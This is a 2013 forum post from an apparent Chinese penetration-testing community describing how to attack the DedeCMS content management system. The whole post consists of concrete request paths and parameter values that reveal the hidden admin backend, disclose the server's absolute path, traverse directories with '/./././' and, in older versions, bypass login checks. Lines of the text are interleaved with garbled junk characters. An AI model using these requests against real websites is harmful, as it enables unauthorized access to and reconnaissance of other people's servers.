找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2001|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理  v( D6 ^% g; F( Y! \
  R( M; V/ ?  |2 q- X4 }
员帐号,新版本的就直接转向了后台.3 g: f7 k- O6 h
' W' Z5 c! |" m6 u2 Z
2.include/dialog/config.php会爆出后台管理路径
2 j" |3 m# C: m3 Z9 k: t$ i- \* w' x& F. `4 c" i
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
3 G9 K( l& O) q' E" U1 }- q0 i( J% u
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
2 Q2 ^! q  K' @" m& ~3 w" L
3 i# M1 U# B) M6 \% x0 I; k: d5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉  y4 R; }9 [& \' b1 R1 \( Z" n; ~! e
4 _/ |/ G* {) y: a
到根目录去.不过这些版本的访问地址有些不同.
& J  c! S! F* e* Q1 h地址为require/dialog/select_soft.php?activepath=/././././././././
( l+ E% k# m! e8 y& J' O# }, \3 f- a( y, S# D$ G3 u) n1 Q
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..$ {: a( b8 S4 \- V
存在相同问题的文件还有5 n2 i( v$ Z0 |
include\dialog\select_images.php, l' z  G! j0 g% z
include\dialog\select_media.php( m: I7 n. b) v4 \  t  X, ~
include\dialog\select_templets.php​
. i9 u) ~' |- V7 G
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表